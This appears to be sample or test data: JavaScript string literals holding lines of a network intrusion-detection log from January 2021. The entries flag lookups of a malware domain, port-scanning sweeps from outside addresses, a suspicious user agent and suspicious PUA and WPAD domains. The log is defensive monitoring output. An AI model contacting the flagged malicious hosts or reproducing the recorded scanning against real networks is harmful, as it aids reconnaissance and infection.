    '"2021-01-11 02:57:10.484183" r2d2 2.200.110.232 64336 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:57:10.485719" r2d2 2.200.107.146 23922 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:57:10.511791" r2d2 2.200.110.233 65180 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:57:01.000340" r2d2 91.123.157.56 3041,3042,3043,3044,3045,3046,3047,3048,25716,39665,47420,47422,47467,47469,47473,47475,47477,47478,47480,47482,47484,47488,47490,47494,47546,47551,47554,47555,47557,47559,47561,47562,47563,47564,47568,47570,47571,47572,47574,47575,47576,47577,47580,47581,47583,47587,47588,47590,47591,47593,47596,47599,47600,47602,47606,47608,47615,47616,47618,47756,47759,47762,47765,47768,47771,47777,47780,47786,47789,47795,47841,47847,47852,47854,47856,47858,47860,47861,47863,47867,47869,48363,48368,48372,48379,48383,48387,48391,48400,48411,48420,48424,48429,48433,48441,48445,48449,48454,48458,48462,48692,48747,48885,48887,48889,48891,48893,48895,48897,48899,48901,48903,48905,48907,48909,48910,48912,48914,48916,48918,48920,48922,48924,48925,48927,48929,48931,48934,48937,48940,48943,48946,48949,48952,48955,48959,48962,48964,48966,48968,48970,48972,48974,48976,48978,48980,48982,48984,48986,48988,48990,48992,48994,48998,49001,49004,49008,49012,49016,49020,49024,49027,49030,49034,49038,49042,49045,49048,49051,49054,49057,49060,49063,49066,49069,49072,49075,49121,49122,49124,49126,49129,49131,49133,49135,49137,49138,49140,49142,49144,49146,49148,49150,49152,49153,49154,49155,49157,49159,49160,49161,49162,49163,49165,49167,49169,49171,49174,49177,49180,49183,49186,49189,49192,49195,49198,49201,49204,49208,49211,49214,49234,49237,49240,49244,49248,49251,49254,49260,49263,49267,49271,49275,49279,49282,49287,49289,49291,49292,49295,49296,49298,49301,49302,49305,49306,49308,49309,49312,49313,49316,49317,49321,49323,49324,49326,49327,49328,49329,49330,49331,49332,49333,49334,49335,49336,49337,49338,49340,49341,49343,49344,49346,49347,49349,49350,49352,49353,49355,49357,49358,49360,49361,49363,49364,49366,49367,49369,49370,49372,49373,49375,49376,49378,49379,49381,49382,49436,49439,49440,49442,49443,49445,49446,49448,49449,49451,49452,49454,49455,49457,49458,49460,49462,49464,49466,49469,49470,49473,49475,49478,49479,49484,49485,49487,49488,49491,49493,49496,49497,49501,49502,49504,49505,49507,49508,49511,49512,49514,49515,49516,49517,49519,49521,49524,49527,49529,49531,49533,49535,49537,49540,49542,49546,49549,49552,49555,49558,49622,49625,49628,49632,49637,49641,49646,49650,49652,49655,49660,49661,49664,49668,49670,49673,49677,49682,49687,49692,49712,49715,49717,49797,49800,49803,49806,49809,49812,49817,49820,49823,49826,49829,49833,49836,49843,49846,49849,49852,49854,49857,49859,49861,49864,49867,49869,49870,49873,49874,49877,49878,49881,49884,49886,49888,49890,49893,49894,49897,49898,49901,49903,49907,49926,49930,49934,49937,49941,49945,49949,49953,49958,49962,49966,50003,50005,50008,50011,50014,50018,50021,50023,50026,50029,50033,50034,50035,50036,50037,50038,50039,50040,50041,50042,50043,50044,50045,50046,50047,50048,50049,50050,50051,50052,50053,50054,50055,50056,50057,50058,50059,50060,50061,50062,50063,50064,50065,50066,50067,50068,50069,50070,50071,50072,50073,50074,50075,50076,50077,50078,50079,50080,50081,50082,50083,50084,50085,50086,50088,50090,50092,50094,50096,50098,50101,50103,50105,50107,50109,50111,50113,50115,50117,50119,50121,50123,50125,50127,50129,50132,50134,50136,50138,50140,50142,50144,50146,50148,50150,50152,50154,50156,50158,50160,50162,50164,50166,50168,50170,50172,50174,50176,50178,50180,50182,50184,50186,50188,50190,50192,50194,50196,50198,50200,50203,50205,50207,50209,50211,50213,50215,50216,50219,50221,50222,50224,50226,50228,50230,50232,50233,50234,50236,50237,50239,50241,50243,50245,50247,50249,50250,50252,50254,50256,50258,50260,50261,50263,50265,50267,50269,50271,50273,50275,50277,50279,50280,50283,50285,50287,50289,50291,50293,50296,50298,50300,50302,50303,50324,50326,50328,50329,50331,50333,50335,50337,50338,50340,50343,50344,50346,50348,50350,50352,50355,50356,50359,50360,50363,50366,50369,50372,50375,50378,50381,50384,50386,50388,50390,50392,50394,50396,50398,50400,50402,50404,50406,50408,50411,50414,50417,50420,50423,50426,50428,50431,50433,50435,50437,50439,50441,50443,50445,50446,50447,50448,50449,50450,50451,50452,50453,50454,50455,50456,50457,50458,50459,50462,50463,50465,50467,50468,50470,50471,50473,50475,50477,50479,50481,50491,50493,50495,50497,50499,50501,50503,50505,50507,50509,50511,50513,50514,50515,50516,50517,50518,50519,50521,50523,50525,50527,50529,50531,50533,50535,50537,50539,50541,50543,50545,50547,50549,50551,50553,50555,50557,50559,50561,50563,50565,50631,50633,50635,50637,50639,50641,50643,50645,50646,50648,50649,50651,50652,50654,50655,50657,50658,50660,50661,50663,50664,50666,50667,50669,50670,50672,50673,50675,50676,50678,50679,50681,50682,50684,50686,50688,50690,50692,50694,50696,50698,50700,50702,50703,50705,50706,50708,50710,50712,50714,50716,50718,50720,50722,50724,50726,50728,50730,50732,50733,50735,50738,50803,50804,50805,50806,50807,50808,50809,50810,50811,50812,50813,50814,50815,50816,50817,50818,50819,50820,50821,50822,50823,50824,50825,50826,50827,50828,50829,50830,50831,50832,50833,50834,50835,50836,50837,50838,50839,50840,50841,50842,50843,50844,50845,50846,50847,50848,50849,50850,50851,50852,50853,50854,50855,50856,50857,50858,50859,50860,50861,50862,50863,50864,50865,50866,50867,50868,50869,50870,50871,50872,50873,50874,50875,50876,50877,50878,50879,50880,50881,50882,50883,50884,50885,50886,50887,50888,50889,50890,50891,50892,50893,50894,50895,50896,50897,50898,50899,50900,50901,50902,50903,50905,50906,50908,50911,50914,50917,50920,50923,50925,50927,50930,50934,50936,50939,50943,50946,50949,50951,50953,50954,50955,50956,50957,50958,50959,50960,50961,50962,50963,50964,50965,50966,50967,50968,50969,50970,50971,50972,50973,50974,50975,50976,50977,50978,50979,50980,50981,50982,50983,50984,50986,50987,50988,50989,50991,50992,50995,50998,51001,51004,51006,51009,51012,51015,51018,51021,51023,51026,51028,51031,51034,51036,51038,51041,51043,51045,51047,51049,51051,51053,51055,51084,51085,51087,51088,51091,51094,51096,51099,51102,51105,51108,51221,51223,51225,51227,51228,51230,51232,51235,51237,51239,51240,51242,51245,51248,51251,51253,51582,51583,51584,51585,51586,51588,51589,51590,51591,51592,51593,51594,51596,52022,52024,52026,52339,52344,52346,52348,52350,52352,52354,52356,52358,52360,52362,52364,52366,52369,52372,52378,52381,52384,52387,52390,52393,52396,52399,52402,52403,52405,52406,52408,52409,52411,52412,52414,52420,52421,52423,52426,52427,52429,52430,52433,52435,52436,52438,52440,52441,52443,52444,52446,52447,52449,52450,52452,52453,52455,52458,52459,52461,52462,52465,52470,52473,52474,52476,52477,52480,52482,52483,52485,52486,52488,52489,52491,52492,52494,52495,52497,52498,52500,52502,52504,52506,52508,52510,52513,52515,52517,52519,52521,52523,52525,52528,52530,52532,52534,52536,52539,52541,52543,52545,52547,52550,52552,52553,52556,52558,52561,52564,52567,52570,52573,52576,52579,52582,52585,52588,52591,52594,52597,52600,52603,52605,52607,52610,52613,52615,52618,52621,52623,52625,52628,52630,52632,52634,52636,52639,52640,52642,52644,52646,52648,52703,52705,52706,52708,52711,52714,52718,52720,52722,52723,52968,52971,52975,52978,52982,52986,52990,52994,52998,53002,53006,53010,53013,53016,53018,53022,53081,53084,53086,53088,53090,53092,53094,53095,53097,53099,53101,53103,53105,53505,53506,53507,53509,53510,53511,53512,53516,53517,53518,53519,53675,53677,53681,53684,53687,53690,53819,53821,53827,53829,53831,53947,53952,53954,53959,53961,53963,53969,53971,53973,53975,53978,54042,54045,54048,54052,54056,54058,54061,54066,54069,54075,54078,54137,54141,54144,54147,54149,54152,54156,54159,54165,54168,54171,54174,54177,54180,54184,54251,54255,54258,54261,54264,54267,54270,54273,54276,54279,54285,54290,55430,55433,55440,55444,55455,55464,55468,55472,55477,55481,55485,55489,55494,55498,55501,55504,55509,55511,55514,55522,55531,55534,57746,57747,57748,57750,57751,57752,57753,57754,57755,57756,57757,57815,57817,57820,57823,57826,57829,57832,57835,57838,58002,58003,58004,58005,58006,58007,58008,58009,58010,58011,58012,58013,58014,58015,58017,58018,58020,58021,58022,58023,58024,58025,58026,58028,58029,58030,58031,58032,58033,58034,58035,58036,58037,58039,58040,58091,58095,58098,58101,58102,58104,58105,58107,58108,58699,58745,58749,58752,58756,58760,58764,58768,58772,58776,58779,58783,58787,58790,58793,58796,58800,58803,58805,58808,58811,58814,58817,58820,58889,58894,58896,58898,58900,58902,58904,58906,58908,58910,58989,58993,58997,59073,59075,59082,59085,59088,59091,59096,59098,62731,62733,62737,62738,62740,62744,62746,62750,62753,62755,62757,65321 2.200.103.163,2.200.103.165,2.200.103.185,2.200.103.188,2.200.104.12,2.200.104.15,2.200.104.192,2.200.104.193,2.200.104.194,2.200.104.195,2.200.104.196,2.200.104.197,2.200.104.198,2.200.104.199,2.200.104.2,2.200.104.200,2.200.104.201,2.200.104.202,2.200.104.203,2.200.104.204,2.200.104.205,2.200.104.206,2.200.104.207,2.200.104.240,2.200.104.241,2.200.104.242,2.200.104.243,2.200.104.244,2.200.104.245,2.200.104.246,2.200.104.247,2.200.104.248,2.200.104.249,2.200.104.250,2.200.104.251,2.200.104.253,2.200.104.254,2.200.104.255,2.200.104.31,2.200.104.38,2.200.104.45,2.200.104.59,2.200.104.6,2.200.104.8,2.200.105.100,2.200.105.101,2.200.105.102,2.200.105.103,2.200.105.104,2.200.105.105,2.200.105.106,2.200.105.107,2.200.105.108,2.200.105.109,2.200.105.110,2.200.105.111,2.200.105.112,2.200.105.113,2.200.105.114,2.200.105.115,2.200.105.116,2.200.105.117,2.200.105.118,2.200.105.119,2.200.105.120,2.200.105.121,2.200.105.122,2.200.105.123,2.200.105.124,2.200.105.125,2.200.105.126,2.200.105.127,2.200.105.144,2.200.105.145,2.200.105.146,2.200.105.147,2.200.105.148,2.200.105.149,2.200.105.150,2.200.105.151,2.200.105.152,2.200.105.153,2.200.105.154,2.200.105.155,2.200.105.156,2.200.105.157,2.200.105.158,2.200.105.159,2.200.105.224,2.200.105.229,2.200.105.230,2.200.105.232,2.200.105.234,2.200.105.236,2.200.105.237,2.200.105.239,2.200.105.96,2.200.105.97,2.200.105.98,2.200.105.99 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:57:08.000935" r2d2 91.123.157.56 47418,47420,47422,47546,47550,47554,47559,47562,47566,47570,47573,47873,47875,47877,47879,47882,47886,47889,47892,47895,47901,47904,47927,47931,47932,47939,47942,47947,47950,47954,47960,47963,47966,48692,48747,48885,48887,48889,48891,48893,48895,48897,48899,48901,48903,48905,48907,48909,48910,48912,48914,48916,48918,48920,48922,48924,48925,48927,48929,48931,48934,48937,48940,48943,48946,48949,48952,48955,48959,48962,48964,48966,48968,48970,48972,48974,48976,48978,48980,48982,48984,48986,48988,48990,48992,48994,48998,49001,49004,49008,49012,49016,49020,49024,49027,49030,49034,49038,49042,49045,49048,49051,49054,49057,49060,49063,49066,49069,49072,49075,49121,49122,49124,49126,49129,49131,49133,49135,49137,49138,49140,49142,49144,49146,49148,49150,49152,49153,49154,49155,49157,49159,49160,49161,49162,49163,49165,49167,49169,49171,49174,49177,49180,49183,49186,49189,49192,49195,49198,49201,49204,49208,49211,49214,49234,49237,49240,49244,49248,49251,49254,49260,49263,49267,49271,49275,49279,49282,49287,49289,49291,49292,49295,49296,49298,49301,49302,49305,49306,49308,49309,49312,49313,49316,49317,49321,49323,49324,49326,49327,49328,49329,49330,49331,49332,49333,49334,49335,49336,49337,49338,49340,49341,49343,49344,49346,49347,49349,49350,49352,49353,49355,49357,49358,49360,49361,49363,49364,49366,49367,49369,49370,49372,49373,49375,49376,49378,49379,49381,49382,49436,49439,49440,49442,49443,49445,49446,49448,49449,49451,49452,49454,49455,49457,49458,49460,49462,49464,49466,49469,49470,49473,49475,49478,49479,49484,49485,49487,49488,49491,49493,49496,49497,49501,49502,49504,49505,49507,49508,49511,49512,49514,49515,49516,49517,49519,49521,49524,49527,49529,49531,49533,49535,49537,49540,49542,49546,49549,49552,49555,49558,49622,49625,49628,49632,49637,49641,49646,49650,49652,49655,49660,49661,49664,49668,49670,49673,49677,49682,49687,49692,49712,49715,49717,49797,49800,49803,49806,49809,49812,49817,49820,49823,49826,49829,49833,49836,49843,49846,49849,49852,49854,49857,49859,49861,49864,49867,49869,49870,49873,49874,49877,49878,49881,49884,49886,49888,49890,49893,49894,49897,49898,49901,49903,49907,49926,49930,49934,49937,49941,49945,49953,49958,49962,49966,50003,50005,50008,50011,50014,50018,50021,50023,50026,50029,50033,50034,50035,50036,50037,50038,50039,50040,50041,50042,50043,50044,50045,50046,50047,50048,50049,50050,50051,50052,50053,50054,50055,50056,50057,50058,50059,50060,50061,50062,50063,50064,50065,50066,50067,50068,50069,50070,50071,50072,50073,50074,50075,50076,50077,50078,50079,50080,50081,50082,50083,50084,50085,50086,50088,50090,50092,50094,50096,50098,50101,50103,50105,50107,50109,50111,50113,50115,50117,50119,50121,50123,50125,50127,50129,50132,50134,50136,50138,50140,50142,50144,50146,50148,50150,50152,50154,50156,50158,50160,50162,50164,50166,50168,50170,50172,50174,50176,50178,50180,50182,50184,50186,50188,50190,50192,50194,50196,50198,50200,50203,50205,50207,50209,50211,50213,50215,50216,50219,50221,50222,50224,50226,50228,50230,50232,50233,50234,50236,50237,50239,50241,50243,50245,50247,50249,50250,50252,50254,50256,50258,50260,50261,50263,50265,50267,50269,50271,50273,50275,50277,50279,50280,50283,50285,50287,50289,50291,50293,50296,50298,50300,50302,50303,50324,50326,50328,50329,50331,50333,50335,50337,50338,50340,50343,50344,50346,50348,50350,50352,50355,50356,50359,50360,50363,50366,50369,50372,50375,50378,50381,50384,50386,50388,50390,50392,50394,50396,50398,50400,50402,50404,50406,50408,50411,50414,50417,50420,50423,50426,50428,50431,50433,50435,50437,50439,50441,50443,50445,50446,50447,50448,50449,50450,50451,50452,50453,50454,50455,50456,50457,50458,50459,50462,50463,50465,50467,50468,50470,50471,50473,50475,50477,50479,50481,50491,50493,50495,50497,50499,50501,50503,50505,50507,50509,50511,50513,50514,50515,50516,50517,50518,50519,50521,50523,50525,50527,50529,50531,50533,50535,50537,50539,50541,50543,50545,50547,50549,50551,50553,50555,50557,50559,50561,50563,50565,50631,50633,50635,50637,50639,50641,50643,50645,50646,50648,50649,50651,50652,50654,50655,50657,50658,50660,50661,50663,50664,50666,50667,50669,50670,50672,50673,50675,50676,50678,50679,50681,50682,50684,50686,50688,50690,50692,50694,50696,50698,50700,50702,50703,50705,50706,50708,50710,50712,50714,50716,50718,50720,50722,50724,50728,50730,50732,50733,50735,50738,50803,50804,50805,50806,50807,50808,50809,50810,50811,50812,50813,50814,50815,50816,50817,50818,50819,50820,50821,50822,50823,50824,50825,50826,50827,50828,50829,50830,50831,50832,50833,50834,50835,50836,50837,50838,50839,50840,50841,50842,50843,50844,50845,50846,50847,50848,50849,50850,50851,50852,50853,50854,50855,50856,50857,50858,50859,50860,50861,50862,50863,50864,50865,50866,50867,50868,50869,50870,50871,50872,50873,50874,50875,50876,50877,50878,50879,50880,50881,50882,50883,50884,50885,50886,50887,50888,50889,50890,50891,50892,50893,50894,50895,50896,50897,50898,50899,50900,50901,50902,50903,50905,50906,50908,50911,50914,50917,50920,50923,50925,50927,50930,50934,50936,50939,50943,50946,50949,50951,50953,50954,50955,50956,50957,50958,50959,50960,50961,50962,50963,50964,50965,50966,50967,50968,50969,50970,50971,50972,50973,50974,50975,50976,50977,50978,50979,50980,50982,50983,50984,50986,50987,50988,50989,50991,50992,50995,50998,51001,51004,51006,51009,51012,51015,51018,51021,51023,51026,51028,51031,51034,51036,51038,51041,51043,51045,51047,51049,51051,51053,51055,51084,51085,51087,51088,51091,51094,51096,51099,51102,51105,51108,51221,51223,51225,51227,51228,51230,51232,51235,51237,51239,51240,51242,51245,51248,51251,51253,52022,52024,52026,52339,52344,52346,52348,52350,52352,52354,52356,52358,52360,52362,52364,52366,52369,52372,52378,52381,52384,52387,52390,52393,52396,52399,52402,52403,52405,52406,52408,52409,52411,52412,52414,52420,52421,52423,52426,52427,52429,52430,52433,52435,52436,52438,52440,52441,52443,52444,52446,52447,52449,52450,52452,52453,52455,52458,52459,52461,52462,52465,52470,52473,52474,52476,52477,52480,52482,52483,52485,52486,52488,52489,52491,52492,52494,52495,52497,52498,52500,52502,52504,52506,52508,52510,52513,52515,52517,52519,52521,52523,52525,52528,52530,52532,52534,52536,52539,52541,52543,52545,52547,52550,52552,52553,52556,52558,52561,52564,52567,52570,52573,52576,52579,52582,52585,52588,52591,52594,52597,52600,52603,52605,52607,52610,52613,52615,52618,52621,52623,52625,52628,52630,52632,52634,52636,52639,52640,52642,52644,52646,52648,52703,52705,52706,52708,52711,52714,52718,52720,52722,52723,52810,52812,52818,52820,52825,52826,52827,52829,52833,52835,52837,52968,52971,52975,52978,52982,52986,52990,52994,52998,53002,53006,53010,53013,53016,53018,53022,53081,53084,53086,53088,53090,53092,53094,53095,53097,53099,53101,53103,53105,53588,53589,53590,53591,53592,53593,53595,53596,53597,53598,53600,53945,53947,53949,53952,53954,53957,53961,53966,53969,53971,53973,53978,54137,54141,54144,54149,54156,54159,54165,54171,54177,54180,54184,57815,57817,57820,57823,57826,57829,57832,57835,57838,58002,58003,58004,58005,58006,58007,58008,58009,58010,58011,58012,58013,58014,58015,58017,58018,58020,58022,58024,58026,58028,58029,58031,58091,58095,58098,58101,58104,58107,58699,58745,58749,58752,58756,58760,58764,58768,58772,58776,58779,58783,58787,58790,58793,58796,58800,58803,58805,58808,58811,58814,58817,58820,58889,58894,58896,58898,58900,58902,58904,58906,58908,58910,58989,58993,58997 2.200.104.12,2.200.104.15,2.200.104.178,2.200.104.192,2.200.104.193,2.200.104.194,2.200.104.195,2.200.104.196,2.200.104.197,2.200.104.198,2.200.104.199,2.200.104.200,2.200.104.201,2.200.104.202,2.200.104.203,2.200.104.204,2.200.104.205,2.200.104.206,2.200.104.207,2.200.104.240,2.200.104.241,2.200.104.242,2.200.104.243,2.200.104.244,2.200.104.245,2.200.104.246,2.200.104.247,2.200.104.248,2.200.104.249,2.200.104.250,2.200.104.251,2.200.104.253,2.200.104.254,2.200.104.255,2.200.104.47,2.200.105.100,2.200.105.101,2.200.105.102,2.200.105.103,2.200.105.104,2.200.105.105,2.200.105.106,2.200.105.107,2.200.105.108,2.200.105.109,2.200.105.110,2.200.105.112,2.200.105.113,2.200.105.114,2.200.105.115,2.200.105.116,2.200.105.117,2.200.105.118,2.200.105.119,2.200.105.120,2.200.105.121,2.200.105.122,2.200.105.123,2.200.105.124,2.200.105.125,2.200.105.126,2.200.105.127,2.200.105.144,2.200.105.145,2.200.105.146,2.200.105.147,2.200.105.148,2.200.105.149,2.200.105.150,2.200.105.151,2.200.105.152,2.200.105.153,2.200.105.154,2.200.105.155,2.200.105.156,2.200.105.157,2.200.105.158,2.200.105.159,2.200.105.226,2.200.105.235,2.200.105.239,2.200.105.96,2.200.105.97,2.200.105.98,2.200.105.99 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:57:17.065377" r2d2 178.17.174.14 37502 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 1.1.4322\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:57:08.000564" r2d2 91.123.157.56 47603,47608,47615,47618,48363,48368,48372,48375,48379,48383,48387,48396,48692,48747,48984,48986,48988,48990,48992,48994,48998,49001,49004,49008,49012,49016,49020,49024,49027,49030,49034,49038,49042,49045,49048,49051,49054,49057,49060,49063,49066,49069,49072,49075,49121,49122,49124,49126,49129,49131,49133,49135,49137,49138,49140,49142,49144,49146,49148,49150,49152,49153,49154,49155,49157,49159,49160,49161,49162,49163,49165,49167,49169,49171,49174,49177,49180,49183,49186,49189,49192,49195,49198,49234,49237,49240,49244,49248,49251,49254,49260,49263,49267,49271,49275,49279,49282,49287,49289,49291,49292,49295,49296,49298,49301,49302,49305,49306,49308,49309,49312,49313,49316,49317,49321,49323,49324,49326,49327,49328,49329,49330,49331,49332,49333,49334,49335,49336,49337,49338,49340,49341,49343,49344,49346,49347,49349,49350,49352,49353,49355,49357,49358,49360,49361,49363,49364,49366,49367,49369,49370,49372,49373,49375,49376,49378,49379,49381,49382,49436,49439,49440,49442,49443,49445,49446,49448,49449,49451,49452,49454,49455,49457,49458,49460,49462,49464,49466,49469,49470,49473,49475,49478,49479,49484,49485,49487,49488,49491,49493,49496,49497,49501,49502,49504,49505,49507,49508,49511,49512,49514,49515,49516,49517,49519,49521,49524,49527,49529,49531,49533,49535,49537,49540,49542,49546,49549,49552,49555,49558,49622,49625,49628,49632,49637,49641,49646,49650,49652,49655,49660,49661,49664,49668,49670,49673,49677,49682,49687,49692,49712,49715,49717,49797,49800,49803,49806,49809,49812,49817,49820,49823,49826,49829,49833,49836,49843,49846,49849,49852,49854,49857,49859,49861,49864,49867,49869,49870,49873,49874,49877,49878,49881,49884,49886,49888,49890,49893,49894,49897,49898,49901,49903,49907,49926,49930,49934,49937,49941,49945,49949,49953,49958,49962,49966,50034,50036,50038,50040,50042,50044,50046,50048,50050,50052,50054,50056,50058,50060,50062,50064,50066,50068,50070,50072,50074,50076,50078,50080,50082,50084,50086,50088,50090,50092,50094,50096,50098,50101,50103,50105,50107,50109,50111,50113,50115,50117,50119,50121,50123,50125,50127,50129,50132,50134,50136,50138,50140,50142,50144,50146,50148,50150,50152,50154,50156,50158,50160,50162,50164,50166,50168,50170,50172,50174,50176,50178,50180,50182,50184,50186,50188,50190,50192,50194,50196,50198,50200,50203,50205,50207,50209,50211,50213,50215,50216,50219,50221,50222,50224,50226,50228,50230,50232,50247,50249,50250,50252,50254,50256,50258,50260,50261,50263,50265,50267,50269,50271,50273,50275,50277,50279,50280,50283,50285,50287,50289,50291,50293,50296,50298,50300,50302,50303,50324,50326,50328,50329,50331,50333,50335,50337,50340,50344,50348,50352,50356,50360,50445,50446,50447,50448,50449,50450,50451,50452,50453,50454,50455,50456,50457,50458,50459,50462,50463,50465,50467,50468,50470,50471,50473,50475,50477,50479,50481,50491,50493,50495,50497,50499,50501,50503,50505,50507,50509,50511,50513,50514,50515,50516,50517,50518,50519,50521,50523,50525,50527,50529,50531,50533,50535,50631,50633,50635,50637,50639,50641,50643,50645,50646,50648,50649,50651,50652,50654,50655,50657,50658,50660,50661,50663,50664,50666,50667,50669,50670,50672,50673,50675,50676,50678,50679,50681,50682,50684,50686,50688,50690,50692,50694,50696,50698,50700,50702,50703,50705,50706,50708,50710,50712,50714,50716,50718,50720,50722,50724,50728,50730,50732,50733,50735,50738,50803,50804,50805,50806,50807,50808,50809,50810,50811,50812,50813,50814,50815,50816,50817,50818,50819,50820,50821,50822,50823,50824,50825,50826,50827,50828,50829,50830,50831,50832,50833,50834,50835,50836,50837,50838,50839,50840,50841,50842,50843,50844,50845,50846,50847,50848,50849,50850,50851,50852,50853,50854,50855,50856,50857,50858,50859,50860,50861,50862,50863,50864,50865,50866,50867,50868,50869,50870,50871,50872,50873,50874,50875,50876,50877,50878,50879,50880,50881,50882,50883,50884,50885,50886,50887,50888,50889,50890,50891,50892,50893,50894,50895,50896,50897,50898,50899,50900,50901,50902,50903,50905,50906,50908,50911,50914,50917,50920,50923,50925,50927,50930,50934,50936,50939,50943,50946,50949,50951,50953,50954,50955,50956,50957,50958,50959,50960,50961,50962,50963,50964,50965,50966,50967,50968,50969,50970,50971,50972,50973,50974,50975,50976,50977,50978,50979,50980,50982,50983,50984,50986,50987,50988,50989,50991,50992,50995,50998,51001,51004,51006,51009,51012,51015,51018,51021,51023,51026,51028,51031,51034,51036,51038,51041,51043,51045,51047,51049,51051,51053,51055,51058,51060,51064,51066,51068,51072,51074,51076,51078,51082,51084,51085,51087,51088,51091,51094,51096,51099,51102,51105,51108,51221,51223,51225,51227,51228,51229,51230,51232,51235,51237,51239,51240,51242,51245,51248,51251,51253,52022,52024,52026,52339,52344,52346,52348,52350,52352,52354,52356,52358,52360,52362,52364,52366,52369,52372,52378,52381,52384,52387,52390,52393,52396,52399,52402,52403,52405,52406,52408,52409,52411,52412,52414,52420,52421,52423,52426,52427,52429,52430,52433,52435,52436,52438,52440,52441,52443,52444,52446,52447,52449,52450,52452,52453,52455,52458,52459,52461,52462,52465,52470,52473,52474,52476,52477,52480,52482,52483,52485,52486,52488,52489,52491,52492,52494,52495,52497,52498,52500,52502,52504,52506,52508,52510,52513,52515,52517,52519,52521,52523,52525,52528,52530,52532,52534,52536,52539,52541,52543,52545,52547,52550,52552,52553,52556,52558,52561,52564,52567,52570,52573,52576,52579,52582,52585,52588,52591,52594,52597,52600,52603,52605,52607,52610,52613,52615,52618,52621,52623,52625,52628,52630,52632,52634,52636,52639,52640,52642,52644,52646,52648,52703,52705,52706,52708,52711,52714,52718,52720,52722,52723,52968,52971,52975,52978,52982,52986,52990,52994,52998,53002,53006,53010,53013,53016,53018,53022,53081,53084,53086,53088,53090,53092,53094,53095,53097,53099,53101,53103,53105,54137,54141,54144,54147,54149,54152,54156,54168,54174,54177,54180,54184,54293,54296,54299,54302,54305,54730,54733,54736,54738,54741,54747,54774,57815,57817,57820,57823,57826,57829,57832,57835,57838,57894,57898,57902,57910,57918,57922,57927,57936,57940,57944,57947,58002,58003,58004,58005,58006,58007,58008,58009,58010,58011,58012,58013,58014,58015,58017,58018,58020,58022,58024,58026,58028,58029,58031,58091,58095,58098,58101,58104,58107,58699,58745,58749,58752,58756,58760,58764,58768,58772,58776,58779,58783,58787,58790,58793,58796,58800,58803,58805,58808,58811,58814,58817,58820,58889,58894,58896,58898,58900,58902,58904,58906,58908,58910,58989,58993,58997,59037,59045,59049,59052,59055,59061,59064,59067,59069,59074,59076 2.200.103.1,2.200.103.186,2.200.104.15,2.200.104.192,2.200.104.193,2.200.104.194,2.200.104.195,2.200.104.196,2.200.104.197,2.200.104.198,2.200.104.199,2.200.104.200,2.200.104.201,2.200.104.202,2.200.104.203,2.200.104.204,2.200.104.205,2.200.104.206,2.200.104.207,2.200.104.240,2.200.104.241,2.200.104.242,2.200.104.243,2.200.104.244,2.200.104.245,2.200.104.246,2.200.104.247,2.200.104.248,2.200.104.249,2.200.104.250,2.200.104.251,2.200.104.253,2.200.104.254,2.200.104.255,2.200.104.3,2.200.105.100,2.200.105.101,2.200.105.102,2.200.105.103,2.200.105.104,2.200.105.105,2.200.105.107,2.200.105.108,2.200.105.109,2.200.105.110,2.200.105.112,2.200.105.113,2.200.105.114,2.200.105.115,2.200.105.116,2.200.105.117,2.200.105.118,2.200.105.119,2.200.105.120,2.200.105.121,2.200.105.122,2.200.105.123,2.200.105.124,2.200.105.125,2.200.105.126,2.200.105.127,2.200.105.144,2.200.105.145,2.200.105.146,2.200.105.147,2.200.105.148,2.200.105.149,2.200.105.159,2.200.105.234,2.200.105.26,2.200.105.96,2.200.105.97,2.200.105.98,2.200.105.99 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:57:18.593837" r2d2 2.200.107.146 38493 172.64.33.92 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:57:30.000613" r2d2 45.95.202.106 34684,36352,36356,36922,37430,38546,39306,41684,44660,45390,45998,47516,48344,50644,53502,54884,54984,59980,60784 2.200.106.85 81,84,86,89,1024,5000,6001,6002,6003,8001,8080,8083,8090,8200,8888,9000,10000,50001,60001 TCP IP 45.95.202.106 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:57:30.000549" r2d2 45.95.202.106 33024,33090,34684,36352,36356,37430,39306,41340,41684,44660,45390,45998,47516,50644,50690,50734,52406,53502,53788,56808,59016,59980 2.200.106.85 81,82,85,86,1024,2000,6001,6002,6003,8000,8001,8080,8081,8082,8083,8084,8090,8200,9200,10000,50000,50001 TCP IP 45.95.202.106 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:57:30.000287" r2d2 45.95.202.106 33024,34684,36352,36356,36922,37430,40890,41340,41684,44818,45390,45962,46234,47454,47516,50690,51986,53360,53502,54884,54984,56808,59016,60784 2.200.106.85 80,82,83,84,85,86,88,89,90,91,1024,2000,3000,5000,6001,6002,6003,6004,8001,8080,8082,8083,8084,9000 TCP IP 45.95.202.106 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:57:31.000052" r2d2 45.95.202.106 34684,36352,36356,36922,41684,45390,45962,47454,47516,50734,51986,53502,59016,59980 2.200.106.85 80,81,83,86,88,89,6001,6002,6003,8000,8001,8080,8082,8083 TCP IP 45.95.202.106 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:57:46.220632" r2d2 2.200.97.1 58977 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:58:04.835674" r2d2 2.200.110.233 49344 2.200.107.169 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 02:58:04.836829" r2d2 2.200.107.146 47173 54.197.149.214 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
